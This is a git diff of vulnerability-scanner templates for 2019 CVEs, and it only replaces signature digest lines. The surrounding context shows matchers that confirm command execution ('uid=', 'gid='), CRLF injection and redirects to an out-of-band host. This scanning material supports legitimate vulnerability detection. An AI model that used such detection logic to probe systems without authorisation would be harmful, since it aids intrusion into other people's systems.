4a0a0047304502204f9e53b5bbe186eead22c5d94047633edadc37b403e5d466f3bb3dd0ac785c28022100b701684e93c0dd5845c17d0cf39e7f2083164299bc4f8cba427b4e77a63f0dd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e90ac8ee5bc2cb7702a36eaba6b7f61ada92416dc6cde6dfcad4cab62dab86b7022100ba8673011e6db0f0d5b1541224ae16f66abc184fa5e3cfd4a74fc0913a45e6f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index b7f549d5ca..3598602268 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -46,4 +46,4 @@ http: - status_code == 200 - contains_all(body, "uid=", "gid=", "pwd&id") condition: and -# digest: 490a004630440220280b2ea7e5f9a130af05a4cb347a3f11feac0e1a828778b316120ca09497b35202203c6b90c15e13f7644e7378a3f6c190122d02e561e6c633da4d7806ad48cc6593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100910262ffe6c77441ba68f916b570b17ce562312552c005705f74e4d98b707cb202210095ee7a44de173c66caa32136d1358e50fc61c5f7ba861ceef1aeeab1cbd83608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index d4fd45771f..0d3c981a32 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ff922b17ee9c8bdced7270617f9237b3c168f5a4c54f97967f4b65e9f7b483800221008eb32a73d61d0a4821cd9d10fc9ffe0b880aea91d9b330fbed9a2b4c39c19d29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a104f07736ab61d65c088346f2cab8758fd5de9010e146e06a7881ff0ad7784e022100cec6ddf7d75872b227ace8173983137a63e078d8ef2b089548821704cb23415e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16469.yaml b/http/cves/2019/CVE-2019-16469.yaml index 4773f776e6..8b68890777 100644 --- a/http/cves/2019/CVE-2019-16469.yaml +++ b/http/cves/2019/CVE-2019-16469.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022018d2b67e1e0a3333f6012130917e6fd4937e0e93b8a27ffcfc00046b55f2dc0a0220719240472fa14c7ae17e758f8c76fc1a383e0122e3580e59325b801b71ccfad7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6130710c273251aa45ab32a5f8b20bfb89e4b1409b486b585c621984a9b3d860220216a30793beb70e6b99920b838013f3d59a45bcfcb0d861d056b086c6673a881:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index ad6e6b78df..8b53778617 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201c980e1cc9295acc3ea8f0ee881a72567d1ec6ffa4ac567fea89481b295c0e0a02204bf877bd29f0fab7988cfc84b9e76e9dba72b1b54c1fd7a55e302cf5ee4e129d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220010bb873f36ec413a0d70d60a2c0bc31c520e0c549a3f4aa0930e9596f8fdd1e02205293c4a5430acf4d8bc891f5b50f432899d3cf35cc6bf32558669d1de9508982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index 34d4997cf2..84a9c1cb5e 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220108b02b3a681fbbee93437bf8d74b1eae57cf93529b9422dca41139bf25c6a0302204917a36515a81b0fbde8658f625dbc4c0dcaa1f8bf14d8a684f6f39e0813e7eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b774b995c8a251654cbba6579b3c7acc16ffa7548dd4094afcbed1c20861649f02202e636706d88f6ea3af4bae9748ea56b02e264307b9656ae065b9b38799d8d29e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 38bae35df0..d6f3c05c29 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220447d5b339645cffe9353473c0a0de836c887dba7f80a590202ecc11d8c31438e02205bbda663f343afd5da966ccbcc08d2b27dd1f9ab63dc0bdbdfa94365b4235813:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d407fe60c184ba02b45f59c43015ebbaad48212d634db3228644ac8aa957d6ca0220740603bfc9c833c922a1777c930cf4776bb81d1aab79496d5963f98f5eb4cfe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index 07629a5020..4ad8836723 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210096f3aa0ccf71b8bb1f2b334d4e0d25631a25c29ecb407720f516c3b5aa1b054102202ccf8f52ed8812690ac44e08d4443f44f0d5601cdca85cae736756f4bad6074d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b100ab9974bd16719860f013afc3fe8a9b09da541e2df13756dc7ac620cd480f02210080d1fc3247458331b51cf1b884db94afe5b40f5dd4258b168a7569927a66ef62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index f8fd6d484d..a893ed76ae 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -82,4 +82,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 4b0a00483046022100c2643129e31952e9cf7c3318b52efcac062acc9064a29d60c0f8103c8d3a0e58022100955f57a55270cc1d4529e495bfeeb27b66b8ac7a741e5af2e9f37ce321b3d2ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aaf6855a5cc668246cc8f7caa54fb1ff6eb1c4c20bdca09617b9bcd5732326bd022100ed5a0ff7d02dcbe13ce25bb04161a790af5bd1e21450d20fb9a9f1ad72eabe2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index eee644def1..1a9aced431 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -60,4 +60,4 @@ http: part: body_2 words: - 'CVE-2019-17574' -# digest: 4a0a004730450220353cbedd75e2b480e8f6f9d76a276dfbfb15fbf6a7152a3ecaa5ace8e4d6b56c022100ff9ed95c64ed4b24e578c332dc881f7dd9aa3d565d4f23fdc20a1ab9504139d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d986687170de1b55eeb7f1bd3af3f0d1870b9afa5fa84d6f83199ab1a8b7fc86022100bb5d627004e727f6e009007ca6a5bbebb9bdd80f51e621eadb9f3e57f844dcec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index ab9d56a0a1..7ce3477198 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100facc830da4786b48cef07848a6b14fcef6f8e742b8130beac4497f1f35629b3902210091898d99487171ca2d220c043f0e5c639a0c325ccc68f6132b3ffd0abc68c8d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c2e8314d8936ecc1f47c71f1544e8daefada4c4eeafabab1b8f2c85701ca93fe02203d3c24d07b8b1d7349e14b242f127ddf4c7fa8d748a06daf95e857109fbbf4e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index 4bd6b023ff..2ff1a825f8 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -49,4 +49,4 @@ http: - "contains(body, 'Interactsh Server')" - status_code == 200 condition: and -# digest: 4a0a0047304502210093b0a98e94593cc39997cdeb7fe6300e3c3b67107346c1bef854fbe2db65078702204eb77fdfc7895a466d57edb6a462fa07823e2803b6ea4f5a67f0170ba6a3d3cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205e4c34a54e7f6b8d3c33e7ce5295f046a808875c3a14fc9f382dc4826356d608022100a4de6b7fd71604125a8f871e653777afb9f4b796bb1dbfbf4a1f78d04ef4d752:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml index d731ab0b7b..20d567141f 100644 --- a/http/cves/2019/CVE-2019-18922.yaml +++ b/http/cves/2019/CVE-2019-18922.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c65f4f6d592dca89e7ebbdc1b39bd75eadfc53d053ebf3d18d95b8ca6326f00f022051781be2351bb20519dec431bcf455ae7c61c30852a4b764b48075540f575bd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ff84b558f75eb38161c021b8b87a3d4e6fe717451178cfc4696ce3b51eda2f1d022012531df8bf440bfbae8560487bc1e6525b2f8135e935e360243d2fe76c2afd61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 1a608fb539..8a89088af9 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -45,4 +45,4 @@ http: - 'contains(to_lower(body), "ethernet") && contains(to_lower(body), "connection")' - 'contains(header, "application/octet-stream")' condition: and -# digest: 4a0a00473045022100d54f540b5b6aeff843c04a84ea89453b4f87d437225f5a58ad950aaf7b962d0902204e33ec81c762ae79110891ee18ab9502a9f1676025edb1130764a2cf293e6fc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c2acad7f7d2d4d52189281e29c6c26bad2f26c7adee394510742f8765c37551022009a57ecb499d152c7573a64108a1b620dc777b5f6d97a3b219a28edba0e5509d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index 50c8b7f132..1d8e71cb1b 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a74b554e3b466bd1911b5c21e80c1ddc0e733d7b632d4cb02f12506bf2e8f2110220546c7aa25f7fa40b46f424b168c53f9fd9a13d494c9bf36d9b62de666f236f1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ba131a3d954c96b2154ba671677f5e80a514bc39ffe5a790f2512276bdc33c0102200248428c70a41e0331c6dc3a86879f5a14e82955c691e23df0f5d9fb78d548fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index 74f2612a12..da687b6ec9 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100b096f24b4e9ce9ef0b364b53f3086ac37d7d62135469943a6d182818d3f7f050022100d2d82add8da52ca9ed1c66110a1d1057e75e1be2a6a9f2081892a8326a73a47b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fd9223a292ad729432b2c11681ac042547e29ced62bad52ad6f98b79132008ca022100c38ee333675ac4e337f76dc7325b46736f4dd74cada3abbc454079705440a1bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 7c3e954721..5dac0e3f2f 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -65,4 +65,4 @@ http: - '(?:[a-zA-Z0-9+\/])*_poc.php' internal: true part: body -# digest: 490a0046304402202432a877f033e2b463c6b0de7d33d6d90a47e865e17e2e19a8e479a8f879640c022003444dc13ef4cfc14c149da25fc1f02ce2509e0ee8dc47cd5bc6afded3464b50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a8af24918bdecd514780fb1a475fe5400019d917ea54e2d5a65842b5a54a5ac02207d52ab92bdde0b732c1b66fc690f6dcbe7ca2389980e4d7fea23f5e2ab6b1cfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index 474ed704f2..989225ba20 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c3019a9fea0720e363c5b335733dbefff6b5b99f66f004b770fa8739902aec2022100d20ed4325f8dd9326a57e7425e052d6a47c83cfb30de22810211f067d3bfb132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220594a67b38d4fe51afd7f7d5dd552e0d6aafc0c3700ec4da0723894494a589463022100ea83411b496e63ae7c68a6fec8f67d125f749d559e4c27add4969c3f76e9214e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index fb8dd8f32b..e846f50bb8 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -39,4 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100f3a5ae86c70b7078b23d73b71e1fd18d219083fe3132e6e3bbe256027f778f6b02206b854c42f64451e5e838942423702be1af64919b5a0285d2906d3820ce4396ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ab53a30541dfa06c226087687709439be0aad2b92957273557b87fb5324093d40220468aa50188a9aef751c4da2d9a67d2d9b3e9d4cba73a2b0b43802ea1eb77db0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3396.yaml b/http/cves/2019/CVE-2019-3396.yaml index ee304d0792..a4b14c0825 100644 --- a/http/cves/2019/CVE-2019-3396.yaml +++ b/http/cves/2019/CVE-2019-3396.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ebb30686679c484918c378d4f6de1efbf081a62a2c405ed8a07161e6f426ee44022100a65d9e1e0047c1d65157e0eaea76448e5c88e2b4a63bfad7e621954b0bf7a9b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e2c89479be3829377857c257ead504a98a4a2c93414e600a88f2b3135b30bb7022100cd3073e10eff41159acf535a326860c002dc99f889d831a3abe9e7f62b70483a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index 80149deac7..89745956b0 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -86,4 +86,4 @@ http: - 'ta name="ajs\-draft\-id" content="([0-9]+)">' internal: true part: body -# digest: 490a00463044022023954ef262e10a2797891b9272caadb091696a23cfcee6a3de46c63198faa3170220636a447d66efbafff4abbc6153a712e1b6975e19091066b9fae32ab88ef94a60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100878659045686f932ad5d2892dac9d7353b7193feafb18cba6de20a13fba52e1902206f1308c31577b4630ad479770f96fc38341e4fc02918bfa88f28e74a4dda8094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml index 35aabc1efa..aa1f301724 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml @@ -49,4 +49,4 @@ http: # If you change this setting, you will still need to update the existing filters and dashboards if they have already been # shared publicly. # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. -# digest: 490a0046304402203cfc5734917a4a8314e9f5dadf95ec2d84882a74b70ce0fa2e23285deb3a6cc102205e976d452ae7d925f5ea54caf360eb72a91aa7ac209bbcf936f52073d0485e54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9170f7bdd41f6dbe0f06d367172ecbd5cb49b7f8104efe60cf879d4be199f4102201491492580142a51c3153ed2fc616e93e49484152010d8f2c9dbcee3eac961c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index 3001a2760c..13028de37b 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ b/http/cves/2019/CVE-2019-3402.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220014cda7bcb0ca01f99e7973644e2e5adc52e573eb4a187b16147779932dd310a022100c354c44a90929adfb0657f0a0c37506bfcdb64c5cb077c00d8fdd6c4d873f7d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201fdd87547b4b4f0da9b7c5d508247253c3619369479b116de338b309d92cde01022010a7c72fa7219ac5fb6603fa55ba82dfef346d1c3facac9ffd2cc273994a98cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index b551f6d9c6..acef579349 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -54,4 +54,4 @@ http: words: - 'total":0' negative: true -# digest: 490a004630440220290762bcec2beed2199cb1c76946cae39d8e7c30ed600299a74164da6ef2213302201cea66d51bba3fc6d2ab476107c10e675491eff401ab6c07f160e01fd236b216:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb4ec7a5ba1563825fd5d4e584abbaffad9c9e42a47769dbef7a2290f4c1afaf022100a77b6ea1a9f0055966ecd39e0c8b13da86237cc0148140e26034a94a8e74a3bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index 442c28b963..0ef97d7df1 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022011a4d3bb95c8b49735554bd5b28dccc1e9340ed8a46c2ae71f0bf6a03d4c4ab502201ebe9ab9c493dcce7b5f2b7f4c7026a979acc5709619e1f76d68973154487006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aaa0428170bb0f618658fc37bbb9cc2d4f24277414b48351740e780e6fe0219c022077a3f24f1ee67746d5644197050b9e78cceb5d98a8fc759e8033bcca3b5f3f00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index 6c770339e0..266e83c389 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -45,4 +45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502206f07af3840286d9ccfe1b34ac6cd8a954010061efd3a318285138333eefcd0d2022100ed311673dbdfded599a378c849d3ade38c2ebf05a18105d53a3819e14b738844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220098447d0c27083b61ecfb652f52a35594d29858e14c603596346aaf25556e1db022100d8ff86acc84b93e884e807f510616c54d21bd1918e450e05089baece21dfc2dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index 5fc44e83a9..ee0872d735 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -49,4 +49,4 @@ http: status: - 200 - 500 -# digest: 4a0a00473045022100ef5c0fc32514296a1dc215d972a363458e1937dc3fed05fd4667a2a16319352d02207ee12a32e33866524e628d73e631350bca92a1b9e029d8b50d6b19ff3c1e5d29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100978816b4fb1458a04599231818b47a14af8f789c0ee6102bb6be99b7b6f287af022020b6956335919b9d3db992623cbd2b30902fb32cc20e64bd1a6ba7c91404dd63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index 7eaa95e1aa..d3759cf6b3 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c9c626ee5ef3923b221db82797355e601043d7433b1e3a8c7546f491bba9467002202f3194e5e78a7a77330d5db335bf625f737ef2b5f2de7dd693d7f89a015327e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f96397bb65566fde5aae85b907aecc2d52a49ef5cd08c9b1cbc1b38699146c8022100bb9ad9720fd16e526f72be3d0f4a1a804031b3f7d51ff1b06a9fb85b59fa6983:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index c03e7acff8..10c1076128 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210099018f60b7746aa94f9e477510550ea78ad035347077dd9c02426f905c19888802202522ac15b9cfa70c5726edf93432fad537d8e32c1dd38f4e2acd34e71ff0e1f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220059ff811ca67ba074bd4aace764105651571fbcfafa732bf87b97876ef6d951a0220088e2f745d08a1f0ca6967157d78f375ed0fdd825452165930ad2ffba593fef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index 2cde997c55..5964e920cf 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -112,4 +112,4 @@ http: - "X-Powered-By: PHP/([0-9.]+)" internal: true part: header -# digest: 4a0a00473045022100f198d780023209330e131fc491747fd84b51b10da5886314e58c8db1d0a2903702202f4e181e8e32d0f890f657bcd09fa725ac064a5b4af0324e9f90cad16054861c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f046cd821d36c9b1e7631057610cc491d58a1aa89538b67f077b98b22a9c63102201ea24971ec29e4b1165bd9eb6aa58a66f4f4f7c8e0b6c5f9460b93438b9dcd51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 851e466b54..ab43595225 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -43,4 +43,4 @@ http: part: header regex: - "^Set-Cookie: crlfinjection=1;" -# digest: 4a0a00473045022100ef8a6d78cf7c93ec19c282d4e54d277c229b0aca051259648dfc32720c77c6de022073e99112fe73e6b0772db17d7f8ef694ca4f348c6a22884dfa73277b1f338ac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008c43eb00190204cfa303a012d6eff02feaae721fa026f004fa26a4c95cc9e1d022100ca298f0bdeddb2a9d1befca00c072b2a2c177fbe80ae319dd9a9960acdb8b801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index eb62ccb3f3..b04f253a0e 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -70,4 +70,4 @@ http: - 'status_code_3 == 200 && status_code_4 == 400' - 'len(body_3) == 2 && len(body_4) == 2' condition: and -# digest: 490a0046304402200eea406b4dd10703c590fb378ef5037c6dd0f56ba1b1059e66e8105bca0f38f7022021af5ceb6e9087fbafeb243ba19617bd9e3e9aaff723ebd4fea7892cee66428d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a3e9663dc98735508040110a0f0778160d3bb3c76ea3246f73225c2bd7a22d8022100c3ad7ca4c44b23d865c8dbdd5ff2cc9d7a4172e04f03a427d9bbdcc18c2c5ef5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index 7e0f7fd2c7..c4b93f39dc 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -94,4 +94,4 @@ http: regex: - encodeURIComponent\('([A-Za-z0-9]+)'\) internal: true -# digest: 4b0a00483046022100e809e4edb98c43fcda4a8f03819bc69d23cc0335c63bce73175aa1d9bcbdaa9e022100d223c39ee719f6f76378454e15ce6d9c4ed3dfd429c7eaec2a861ed768dfcfc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100895b1e9afb7b43e9f94001785504d406ac63ea160bddb20c0f25601965d1243702205caae85979a4da73c6ea5bc65ae627adbe1f137d4d8a02a0139f1450d641c38d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index c6b2718dd7..7a70ddccdf 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e031e7ea49fd89dc438d2ca32663643fdd1db714cbd2479dc7fd54624e7d36140220353a7163baca0d2ffed244a93d15fdd2ae7319ec565a0d0f24176c85f61c5580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220085b3fea4d491469230f2da70524c626ba672737c3c2e9066c243d06910194f9022100bf154d2a0325b65861a5f19e21cdf45f3c1f0bf06477f6ab7d7dfbdb325a0365:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index 788905205a..0324657937 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ba80d72aceccb03e333f0ed9fb4a02d39d56c68f6444986d9d27ebbaf8e4965c02206292d01987026d4e589546c0b715877dc1700eec847b2338c5025229834a1469:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8ddd702cc0f457e5a34795112850cf0b4badc475aef869bfc839a8366b7055a02204dbcdef719f57c58028f231284a222849e4400b3c6f868e23817cdb39036a6ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index 2ea022182b..c6bc792137 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201601e4fad8e2b48d46f967966a9ab8fa5e458af4c571199d9075862f80a7301a02206c03298347b6c926221c3b151a97daf1c0cb0fa1476a52b42a7ceb9093b8c411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220430f61e3d4671203f38741d48b280202dd41e08417b0dc435cccb0b0d18cafb802202a2fe1c6aa32fd0d284cdd86d6bdcb766df9c05761acdecd9f4de27de5f5a9f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7481.yaml 